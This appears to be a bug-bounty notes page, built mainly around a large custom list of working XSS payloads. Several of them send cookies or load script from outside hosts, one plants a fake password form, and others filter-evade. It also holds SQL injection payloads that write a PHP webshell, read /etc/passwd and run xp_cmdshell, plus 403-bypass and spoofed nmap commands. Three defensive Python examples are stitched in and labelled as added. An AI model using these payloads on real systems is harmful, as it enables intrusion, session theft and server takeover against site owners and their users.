What is cross-site scripting (XSS)?
Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script (JavaScript, etc.), to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. XSS can cause a variety of problems for the end user, ranging in severity from an annoyance to complete account compromise.
XSS attacks may be conducted without using <script>...</script> HTML tags. Other HTML tags will do exactly the same thing, for example <body onload=alert('test1')>, or other HTML attributes such as onmouseover, onerror, onload, etc. (source)
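The defensive counterpart of the explanation above is context-aware output encoding. The following is an added example (not code from the original page): it encodes untrusted values differently for HTML body, quoted-attribute and URL-attribute contexts, and feeds it constructed inputs shaped like the payloads listed below. The function names and the render_profile fragment are assumptions made for the example.

```python
import html
import re

# Constructed sample inputs, modelled on the payload shapes listed on this page:
# each one relies on a tag or attribute boundary the application forgot to encode.
SAMPLES = [
    "<svg onload=alert(1)>",               # new element in HTML body context
    '" onmouseover=alert(1)//',            # breaks out of a double-quoted attribute
    "javascript:alert(document.domain)",   # scheme abuse in href/src
    "jav\tascript:alert(1)",               # same scheme with a tab the browser discards
]

def encode_for_html_body(value: str) -> str:
    """Escape text that will sit between tags (<div>HERE</div>)."""
    return html.escape(value, quote=True)

def encode_for_html_attribute(value: str) -> str:
    """Escape text placed inside a quoted attribute (title="HERE").
    Encoding every non-alphanumeric character as &#NN; is stricter than
    html.escape and also covers backticks, newlines and other quote tricks."""
    return "".join(c if c.isalnum() else f"&#{ord(c)};" for c in value)

# Only plain http(s) URLs or same-origin absolute paths are accepted for href/src.
_SAFE_URL = re.compile(r"^(?:https?://|/(?!/))", re.IGNORECASE)

def sanitize_url_attribute(value: str) -> str:
    """Return the URL if its scheme is allowed, otherwise a harmless '#'.
    Control characters and whitespace are removed first, because a browser
    treats 'jav\\tascript:' or 'java\\rscript:' as the javascript: scheme."""
    cleaned = re.sub(r"[\x00-\x20]", "", value)
    return cleaned if _SAFE_URL.match(cleaned) else "#"

def render_profile(name: str, title: str, link: str) -> str:
    """Build one HTML fragment with every untrusted value encoded for its context."""
    href = html.escape(sanitize_url_attribute(link), quote=True)
    return (
        f'<a href="{href}" title="{encode_for_html_attribute(title)}">'
        f"{encode_for_html_body(name)}</a>"
    )

if __name__ == "__main__":
    for sample in SAMPLES:
        print(render_profile(sample, sample, sample))
```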
Do not use the following XSS payloads in a random or unauthorized web application. I do not take any responsibility for anyone willing to execute or exploit them on random endpoints and parameters; you have been warned!
Click to view my personal custom list of XSS Payloads
--- Important Note ---
--- Please do consider that these payloads are used not for fuzzing nor to be added to a wordlist, ---
--- there are many payloads here that would need additional actions to properly work. ---
--- But of course, if you do wish to add some of them to a wordlist, then there's no problem at all! ---
--- I also add commentary about every/most of the payloads in the commit history ---
<script>alert(document.domain+"\n\n"+document.cookie);<script>
</script><svg><script/class=rodric>alert(1)</script>-%26apos;
</SCRIPT>"><svg/OnLoad="`${prompt``}`">exemplo
""><svg/onload=alert(1)>%27/---+{{77}}"
;//<!----><SCRIPT>alert(1);</SCRIPT><svg onload="alert(document.domain)">
;//<!----><SCRIPT>alert(1);</SCRIPT><svg onerror="alert(document.write(1337))">
<svg onload='alert(1)'
<svg onload="alert(1)"
<svg onload=alert(1)//
<svg onload=alert(1)+
<svg onload=alert(1)<!--
<svg/onload=window.alert();//
<!--><svg/onload=window.alert();//
"><img src =" x "oerror = " alert ('RodricBr); ">
"><script><svg/alert%20(document.cookie)</script>
%22on%3eerror=%22prompt(document.domain)
%27%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
%3Cscript%3Ealert(document.domain);%3C/script%3E
--><font color=blue><h1>xss<img src onerror=alert(`XSS`)>/
"onmouseover=alert(1)//
%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
'onerror=%22alert%60kauenavarro%60%22testabcd))/
%3cscript%3eprompt(document.domain)%3c%2fscript%3e
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.domain%29%3C/ScRiPt%3E
'"()%26%25<acx><ScRiPt%20>alert(document.domain)</ScRiPt>
'();}]9676"></script><script>alert(document.domain)</script>
"%20"><input><img src=x onerror=alert(document.domain)>%3
%22%3E%3C%2Fa%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28document.cookie%29%3B%3E%3C%2Fscript%3E
%3Cmarquee%20loop%3d1%20width%3d0%20onfinish%3dco\u006efirm(document.cookie)%3EXSS%3C%2fmarquee%3E
"><svg+svg+svg\/\/On+OnLoAd=confirm(document.cookie)>
javascript:alert(document.domain)
%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3B%3E
%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28POCkauenavarroxss%29%3E
;'"/'/><svg/onload=confirm('teste
'%22()%26%25<acx><ScRiPt%20>alert(1)</ScRiPt>
<ScRiPt>prompt%289371%29<%2FScRiPt>=<ScRiPt>alert%28document.domain%29<%2FsCrIpT>
0%0d%0a%0d%0a23%0d%0a<svg%20onload=confirm(document.domain)>%0d%0a0%0d%0a
%27x%27onclick=%27alert(1)
onMouseOvER=prompt(/xss/)//
%27%20onclick=alert(document.domain)%20accesskey=X%20
%3Cmarquee%20loop=1%20width=%271%26apos;%27onfinish=self[`al`+`ert`](1)%3E%23leet%3C/marquee%3E
asd"on+<>+onpointerenter%3d"x%3dconfirm,x(cookie)
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
<// style=x:expression\28write(1)\29>
<!--[if]><script>alert(1)</script -->
<a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>@cr:0xInfection
<script>eval(atob(decodeURIComponent("payload")))//
<a href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:open()>clickhere
<svg onx=() onload=(confirm)(1)>
<a+HREF='javascrip%26%239t:alert%26lpar;document.domain)'>teste</a>
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
1'"><img/src/onerror=.1|alert``>
<--`<img/src=` onerror=confirm``> --!>
javascript:{alert`0`}
<base href=//knoxss.me?
<a69/onclick=[1].findIndex(alert)>sussy
<input/oninput='new Function`confir\u006d\`0\``'>
<p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
<svg/onload=prompt(1);>
<isindex action="javas&tab;cript:alert(1)" type=image>
<marquee/onstart=confirm(2)>
3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{
0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C
<table background="javascript:alert(1)"></table>
"/><marquee onfinish=confirm(123)>a</marquee>
<svg/onload=alert()//
<x/onclick=globalThis['\u0070r\u006f'+'mpt']<)>clickme
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
<a69/onclick=write()>hi
<svg/onload=self[`aler`%2b`t`]`1`>
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
"/><svg+svg+svg\/\/On+OnLoAd=confirm(1)>
<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png
java%0dscrip%0d%1b%1bt:console.log`${document.cookie}`}
java%0dscrip%0d%1b%1bt:console.log`${location=`https://www.pudim. com?c=${document.cookie}`}
"><x onauxclick=a=alert,a(domain)>click
<!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>
<sc%00ript>confirm(1)</script>
\"><iframe/src=javascript:alert%26%23x000000028%3b)>
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7
jaVasCript:/*-/*`/*\`/*'/*"/**/(/*+*/oNcliCk=alert()+)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
<data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<Video><source onerror = "javascript: alert (XSS)">
<Input value = "XSS" type = text>
<applet code="javascript:confirm(document.domain);">
<isindex x="javascript:" onmouseover="alert(document.domain)">
"></SCRIPT>''>'><SCRIPT>alert(String.fromCharCode(88.83.83))</SCRIPT>
"><img src="x:x" onerror="alert(document.domain)">
"><iframe src="javascript:alert(document.domain)">
<object data="javascript:alert(document.domain)">
<isindex type=image src=1 onerror=alert(document.domain)>
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<iframe/src="data:text/html,<svg onload=alert(document.domain)>">
<meta content="
 1 
; JAVASCRIPT: alert(document.domain)" http-equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<meta http-equiv="refresh" content="0;url=javascript:confirm(document.domain)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(document.domain)">X
</script><img/*%00/src="worksinchrome:prompt(document.domain)"/%00*/onerror='eval(src)'>
<style>//*{x:expression(alert(/document.domain/))}//<style></style>
<img src="/" =_=" title="onerror='prompt(document.domain)'">
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa href=javascript:alert(document.domain)>CLICK
<form><button formaction=javascript:alert(document.domain)>CLICK
<input/onmouseover="javaSCRIPT:confirm(1)"
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:confirm(document.domain)"></OBJECT>
javascripT:eval('var a=document.createElement(\'script\'):a.src=\'https://ofjaaaah.xss.ht\':document.body.appendChild(a)')
%3Cmarquee%20loop=1%20width=%271%26apos;%27onfinish=self[`al`+`ert`](1)%3E%23leet%3C/marquee%3E
%3Cx%20y=1%20z=%271%26apos;%27onclick=self[`al`%2B`ert`](1)%3E%23CLICK%20MEE
0%3Bdata%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgUE9DbCIpPC9zY3JpcHQ%22HTTP-EQUIV%3D%22refresh%22
xss><svg/onload=globalThis[`al`+/ert/.source]`1`//
"-top['al\x65rt']('sailay')-"
<div onactivate=confirm('Xss') id=xss style=overflow:scroll>
><div onactivate=confirm('Xss')>
<a href="javas%09cript:[1].map(top['ale'+'rt'])">
<a href="jav%0Dascript:alert(1)">
<svg/onload=location=javas+cript:ale+rt%2+81%2+9;//
'/><img/src/onerror=confirm(1)>
%E2%80%A8%E2%80%A9confirm(1)
;confirm(document.domain)//
;onerror=alert;throw%201
<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
<textarea onbeforecopy=alert(1) autofocus>XSS</textarea>
<textarea onbeforecut=alert(1) autofocus>XSS</textarea>
<textarea onbeforepaste=alert(1) autofocus></textarea>
<tfoot id=x tabindex=1 onbeforedeactivate=alert(1)></tfoot><input autofocus>
<tfoot id=x tabindex=1 ondeactivate=alert(1)></tfoot><input id=y autofocus>
<th oncopy=alert(1) value="XSS" autofocus tabindex=1>test
<th oncut=alert(1) value="XSS" autofocus tabindex=1>test
<th ondblclick="alert(1)" autofocus tabindex=1>test</th>
<th onfocusout=alert(1) tabindex=1 id=x></th><input autofocus>
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
');}</script><img src=q onerror=confirm(document.domain)>
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stealthy?x="+location)'>Click
<details onauxclick=confirm`xss`></details>
<x onauxclick=a=alert,a(domain)>click
<!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>
<a href="javas%09cript:[1].map(top['ale'+'rt'])">
<a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
"><svg/on</script>laod=alert>
<ijavascriptmg+src+ojavascriptnerror=confirm(1)>
</ScRiPt><img src=something onauxclick="new Function `al\ert\`xss\``">
javascript:new%20Function`al\ert\`1\``;
<b/onanimationstart=prompt`${document.domain}`>
<style>@keyframes a{}b{animation:a;}</style>
<sVg/onfake="x=y"oNload=;1^(co\u006efirm)``^1//
<Svg Only=1 OnLoad=confirm(1)>
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!-->
</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
"><svg onload=prompt%26%230000000040document.domain)>
"><svg onload=prompt(document.domain)>
"><svg onload=alert%26%230000000040"1")>
"><svg onload=prompt%26%23x000000028;document.domain)>
Supremo-XSS"><body %00 onControl hello onmouseleave=confirm(domain) x>XSS
Supremo-XSS"><html><select %00 onControl onpointerenter=prompt(domain) hello>
Supremo-XSS"><input %00 onControl hello oninput=confirm(domain) x>
"()%26%25<acx><ScRiPt%20>N8Zn(9266)</ScRiPt>
<fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/AmoloHT/`>
'`"><svg onmouseover=confirm(document.domain)>
<p title=" </noscript><style onload=alert(document.domain)//">
%0d%0a</script><img+src=x+onerror=alert(document.domain)>
%0d%0a</script><h1+onmouseover=alert(document.cookie)>mouseOver</h1>
<a href=//X55.is autofocus onfocus=import(href)>%3Ca+href=//X55.is+autofocus+onfocus=import(href)%3E
<a href=javascript:'\74svg/onload\75alert\501\51\76'>
-20a")});a=alert;a(1);//
valor%0aalert(1)%3C/script%3E
<svg onload=a=')',b='t(1',j='javas',s='cript:aler',location=j+s+b+a>
"/><svg onauxclick=co\u006efirm(\1\)>
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
<svg><animate%20onend=alert(document.cookie)%20attributeName=x%20dur=1s>
<h1/%6f%6e/oNclicK=alert`hacked`>APTH
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
"><D3V%0aONPoiNtERENTEr%0d=%0d[document.cookie].find(confirm)%0dx>
" onmouseenter=confirm(1)//
'%20onmouseenter=confirm(1)//
<Svg+OnLoad=import(%27//X55.is%27)>#alert(document.domain)//
%22%27%22%3E%3CMETA%20HTTP-EQUIV%3Drefresh%20CONTENT%3D1%3E%3F%3D
<form action="@collaberator.burpcollaborator.net">Password:<br><input name="p"><br><input type="submit" value="Join meet"></form><\!--
<a/+/OnMoUsEOVEr+=+(confirm)(document.domain)>
/(A('onerror=%22alert%601%60%22testabcd))/
/Orders/(A(%22onerror='alert%60xss%60'testabcd))/Login.aspx?ReturnUrl=/Orders
(A(%22onerror='alert%601%60'testabcd))/Login.aspx?ReturnUrl=%2f
"%20onmouseenter=confirm(document.domain)%20value="
'"onclick=(co\u006efirm)?.0><sVg/i="${{7*7}}"oNload=" 0>(pro\u006dpt)1"></svG/</sTyle/</scripT/</textArea/</iFrame/</noScript/</seLect/--><h1>
<iMg/srC/onerror=alert2>%22%3E%3CSvg/onload=confirm3//<Script/src=//ChiragXSS.xSs.ht></scripT>
"><svg onload=document.forms[1].action='http://localhost/?Hacked'>
"><<![\CDATA[<]]>img src=x onerror=prompt(document.domain)>
<svg/onload=eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ=='))>
<svg/onload=eval(atob('YWxlcnQoJ1hTUycp'))>
<svg onload='new Function`["_Y000!_"].find(al\u0065rt)`'>
<img/src=`%00`%20onerror=this.onerror=confirm(1)
<iframe %00 src="	javascript:prompt(1)	"%00>
<input/onmouseover="javaSCRIPT:confirm(1)"
''""><a OnpoINTeRENtEr=confirm(document.domain)x>
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
%7B%7Bconstructor.constructor(%27confirm(document.domain)%27)()%7D%7D
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
"document.body['innerHTML']=atob('PGltZyBzcmM9InRlc3RlLnBuZyIgb25lcnJvcj0iYWxlcnQod2luZG93Lm9yaWdpbikiPg==')
%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E
%26%2302java%26%23115cript:alert(document.domain)
"><button%20popovertarget=x>Click%20me</button>%0A<xss%20onbeforetoggle=location=`javas`%2B`cript:ale`%2B`rt%2`%2B`81%2`%2B`9`%20popover%20id=x>XSS</xss>
%3Cxss%20contenteditable%20onbeforeinput=alert(1)%3Etest
%27%3E%0A%3C!--%3E%3Ca%20href=%22javascript:import(%27%2f%2fX55.is%27)%22%3ECLICK%3C/a%3E%0A%3C!--%3E
%22bestxss=%3E%3Cxss%20contenteditable%20onbeforeinput=%22a='import(%60/%09/x55.is//%60)';b='javascript:';location=b%2Ba%22%3ESEARCHHERE%3C!--.html
<details open onToGgle=abc=(co\u006efirm);abc(VulneravelXSS)//
%22%3E%3Ca%20href=%22javascript%26%2358%3Bconfirm(1)%22%3E
%22%3E%3Ca%20href=%22javascript%26colon;confirm(1)%22%3E
javascript:%26%23x3A%3Bconfirm(1)
<vIdeO><sourCe onerror="['al\u0065'+'rt'][0]['\x63onstructor']['\x63onstructor']('return this')()[['al\u0065'+'rt'][0]]([String.fromCharCode(8238)+[!+[]+!+[]]+[![]+[]][+[]]])">
<video><source onerror="alert.constructor.constructor('return this')().alert('β0f')">
[][`filter`][`constructor`](String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))() %22%3E%3Cxss%20contenteditable%20onbeforeinput%3D%22a%3D%27promp%27%3Bf%3D%27t%27%3Bb%3D%27%28%27%3Bc%3D%271%27%3Bd%3D%27%29%27%3Be%3D%27javascript%3A%27%3Blocation%3De%2Ba%2Bf%2Bb%2Bc%2Bd%22%3EGREPSTRING%3C
%22%3E%3Cxss%20contenteditable%20onbeforeinput=%22a='promp';f='t';b='%26%230000000040';c='1';d='%26%230000000041';e='javascript:';location=e%2Ba%2Bf%2Bb%2Bc%2Bd%22%3EGREPSTRING%3C
%22%3E%3Cxss%20contenteditable%20onbeforeinput=%22a='promp';f='t';b='(';c='1';d=')';e='javascript:';location=e%2Ba%2Bf%2Bb%2Bc%2Bd%22%3EGREPSTRING%3C
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
1'"><INPUT HRef=\" AutoFocus OnFocus="var a='ale';var b='rt';var c='()';top[a+b]`11`"><"
';k='e'%0Atop['al'+k+'rt'](1)//
<Img Src=OnXSS OnError=alert(1)>
<Img Src=//X55.is OnLoad%0C=import(Src)>
2%22%3E%3C!--%3E%3Cinput%20autofocus%20id=//X55.is%20onfocus=import(id)%3E#alert(document.cookie)
%3Csvg%3E%3Ca%20xmlns:xlink=http://www.w3.org/1999/xlink%20xlink:href=?%3E%3Ccircle%20r=400%20/%3E%3Canimate%20attributeName=xlink:href%20begin=0%20from=javascript:alert(1)%20to=%26%3E
%27%22-import(%60data:text/javascript%60%2batob(%27Ow==%27)%2b%60base64,YWxlcnQoMSk=%60)-%22/
-->"'/></script><deTailS open x=">" ontoggle=(co\u006efirm)``>
What is SQL Injection?
SQL injection attacks are a type of injection attack in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands. The attack consists of an insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutting down the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. (source)
- Advanced SQL Injection payloads for endpoint/parameter fuzzing
Click to view my personal custom list of SQL Injection Payloads
' /*!50000union*/ select 1,2,3,4,5,6,7,8,'data://text/plain,<?php echo system("uname -a");?>'-- -
' /*!50000union*/ select 1,2,3,4,5,6,7,8,'data://text/plain,<?php $a="sy";$b="stem";$c=$a.$b; $c("uname -a");?>' -- -
' /*!50000union*/ select 1,2,3,4,5,'../index',7,8,'php://filter/convert.base64-encode/resource=.' -- -
admin' and (select * from(select(sleep(40)))SQLI) and 'abc' = 'ab
-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,LOAD_FILE('/etc/passwd'),NULL;#
-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,"<?php echo shell_exec($_REQUEST['cmd']);?>",NULL INTO OUTFILE '/var/www/html/c.php';#
(select(0)from(select(sleep(20)))v)/*'+
(select(0)from(select(sleep(20)))v)+'\"+
(select(0)from(select(sleep(20)))v)+\"*/
'+(select*from(select(sleep(20)))a)+'
xxxx'; EXEC xp_cmdshell 'ping interact';--
orwa' AND (SELECT 6377 FROM (SELECT(SLEEP(5)))hLTl)--
1' OR NOT 2470=2470--
orwa'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),10)||'
-1+/*!12345UnIoN*//**/(/*!12345SEleCt*//**/ 1,2)+ β +
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
1' Union Select 1-- -
1%27/**/%256fR/**/50%2521%253D22%253B%2523
"0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z",
query=login&username=rrr';SELECT PG_SLEEP(5)--&password=rr&submit=Login
' AND (SELECT 8871 FROM (SELECT(SLEEP(5)))uZxz)
- Blind SQL Injection in the X-Forwarded-For HTTP header.
- In an attempt to bypass authorization schema.
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
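The definition above and the boolean pair in the list (1' OR NOT 2470=2470--) come together in the following added example, which is not part of the original page: a string-built lookup beside its parameterized form, run against a constructed in-memory SQLite table, plus a regression check that sends the true/false probe pair and reports whether the two results differ. The table, function names and probes are assumptions made for the example.

```python
import sqlite3
from typing import Callable, List, Tuple

Row = Tuple[int, str]

def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (name, role) VALUES (?, ?)",
        [("admin", "administrator"), ("alice", "user"), ("bob", "user")],
    )
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> List[Row]:
    """String-built query: the input is spliced into the SQL grammar, so a quote,
    an OR and a -- comment in it change the query itself."""
    sql = f"SELECT id, name FROM users WHERE name = '{username}'"
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn: sqlite3.Connection, username: str) -> List[Row]:
    """Bound parameter: the value travels separately from the statement, so the
    same characters are just data inside one string literal."""
    return conn.execute(
        "SELECT id, name FROM users WHERE name = ?", (username,)
    ).fetchall()

# Boolean-based pair built from the list above: the same request once with a
# condition that is true and once with one that is false. If the two responses
# differ, the input reaches the SQL grammar. The same check applies to any input
# the application queries, headers such as X-Forwarded-For included.
TRUE_PROBE = "1' OR 2470=2470--"
FALSE_PROBE = "1' OR NOT 2470=2470--"

def reaches_sql(lookup: Callable[[sqlite3.Connection, str], List[Row]],
                conn: sqlite3.Connection) -> bool:
    """Regression check for a data-access function: True means the true/false
    probes produced different results, i.e. the function is injectable."""
    return lookup(conn, TRUE_PROBE) != lookup(conn, FALSE_PROBE)

if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", reaches_sql(lookup_vulnerable, db))     # True
    print("parameterized:", reaches_sql(lookup_parameterized, db))  # False
```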
What is cURL?
cURL is a tool to transfer data from or to a server: a command-line interface (CLI) tool for transferring data specified with URL syntax.
#!/bin/bash
# Request the URL given as the first argument and print only its HTTP status code.
# The status has to be captured before it is echoed.
CODE_=$(curl -w "%{http_code}\n" -s -o /dev/null "$1")
echo -e "\n$1 \t[$CODE_]"
Make the script executable with chmod +x and run it with the target domain as the first argument ($1).
- .NET Deserialization.
The first thing to note about this whole process is that serialization is essentially just a fancy word for converting objects in a program's memory into another format that is easier to share or send over the network. These "serialized" formats are usually quite easy for humans to read, especially when compared to the raw binary format they are stored as in memory. XML and JSON are common examples of these easy-to-read serialization formats. Deserialization is, as the name suggests, the opposite process: converting back from XML/JSON/etc. into a .NET object in memory that the program can work with.
curl -v -s -k https://www.website.com/Login.aspx | grep VIEW >> output.txt
# Print the value of each __VIEWSTATE* hidden input saved above. This assumes the usual
# <input type="hidden" name="..." id="..." value="..." /> layout, where $5 is the value="..." field;
# the sed strips that wrapper so the second awk field is the bare value.
awk -v value="[teste]>>> " '{print value $5}' output.txt | sed 's/value="//; s/"$//' | awk '{print $2}' | sed 'G'
- Mind maps for 403 Bypass: https://github.com/KathanP19/HowToHunt/tree/master/Status_Code_Bypass
- Bypassing 403 medium post
HTTP 403 is an HTTP status code meaning access to the requested resource is forbidden: the server understood the request but will not fulfil it, because the caller lacks privilege on the application.
Tips:
- Try adding ./ or // after the URL. Example: site.com/./ or site.com//
- Try using different request methods to access the unauthorized file/path: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK.
- Check the response headers; they may give away some information. For example, a 200 response to HEAD with Content-Length: 55 means that the HEAD request method can access the resource, but you still need to find a way to exfiltrate that content.
- An HTTP header like X-HTTP-Method-Override: PUT can overwrite the request method used.
- Use the TRACE request method and, if you are very lucky, the response may also show the headers added by intermediate proxies, which can be useful information.
Additional content
curl -s -k -X GET https://www.site.com/ -v -H "X-Originating-IP: 127.0.0.1, 68.180.194.242" -H "User-Agent: GoogleBot" -H "Content-Length:0"
curl -i -s -k -X GET https://www.site.com/ -H "Host: www.site.co" -H "X-rewrite-url: directory"
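From the defending side, every trick in the tips above leaves a trace in the access log. The following added example (not from the original page) runs over constructed log lines in a simplified custom format: it flags the ./ and // path variants, unusual or overridden methods and the spoofing headers used in the curl commands above, and correlates a 403 on a path with a later 2xx on a variant of the same path from the same client, which is the case where a bypass actually worked. The log format, field order and function names are assumptions made for the example.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed access-log lines in a simplified custom format (not a real server's
# default): client, method, path, protocol, status, then the values of the
# X-HTTP-Method-Override and X-Originating-IP request headers ('-' when absent).
SAMPLE_LOG = """\
203.0.113.7 GET /admin HTTP/1.1 403 - -
203.0.113.7 GET /admin/./ HTTP/1.1 200 - -
203.0.113.7 GET /admin// HTTP/1.1 403 - -
203.0.113.7 INVENTED /admin HTTP/1.1 403 - -
203.0.113.7 POST /admin HTTP/1.1 403 PUT -
203.0.113.7 GET /admin HTTP/1.1 403 - 127.0.0.1
198.51.100.2 GET /index.html HTTP/1.1 200 - -
198.51.100.2 GET /admin HTTP/1.1 403 - -
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) \S+ (\d{3}) (\S+) (\S+)$")
STANDARD_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE",
                    "CONNECT", "OPTIONS", "TRACE", "PATCH"}

def normalize_path(path: str) -> str:
    """Collapse the ./ and // variants so every spelling of one path compares equal."""
    parts = [p for p in path.split("/") if p not in ("", ".")]
    return "/" + "/".join(parts)

def bypass_indicators(method: str, path: str, override: str, orig_ip: str) -> List[str]:
    """Name each 403-bypass trick from the tips above that a request line shows."""
    hits = []
    if "/./" in path or "//" in path:
        hits.append("path-normalization-trick")
    if method not in STANDARD_METHODS:
        hits.append(f"nonstandard-method:{method}")
    elif method == "TRACE":
        hits.append("trace-method")
    if override != "-":
        hits.append(f"x-http-method-override:{override}")
    if orig_ip != "-":
        hits.append("x-originating-ip-header")
    return hits

def analyze(log_text: str) -> List[Dict[str, object]]:
    """One alert per suspicious request. A request that uses a trick and gets a
    2xx on a path the same client was previously refused (403) on is the case
    that matters most: the bypass worked."""
    forbidden: Set[Tuple[str, str]] = set()
    alerts: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, method, path, status, override, orig_ip = m.groups()
        key = (client, normalize_path(path))
        hits = bypass_indicators(method, path, override, orig_ip)
        if hits:
            succeeded = status.startswith("2") and key in forbidden
            alerts.append({"client": client, "method": method, "path": path,
                           "status": status, "indicators": hits,
                           "severity": "bypass-succeeded" if succeeded else "probe"})
        if status == "403":
            forbidden.add(key)
    return alerts

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```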
Nmap Ultimate Scan v1 (man)
Nmap (Network Mapper) is a network discovery and security auditing tool.
Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses.
It can also be used for web application testing.
- Replace the API-KEY with your Shodan API Key
sudo nmap --randomize-hosts -Pn 0.0.0.0 --script shodan-api --script-args shodan-api.apikey=API-KEY -v -sS --open --reason --ttl=128 -sV --top-ports=20 --min-rate=2000 -T3 --spoof-mac=google -g443 --script="not intrusive" -oN resultados.txt
--randomize-hosts :: Tells Nmap to shuffle each group of up to 16384 hosts before it scans them.
-Pn :: Skips the host discovery stage altogether.
--script * :: Invoking the script to Shodan API.
-v :: Verbose mode.
-sS :: TCP SYN scan.
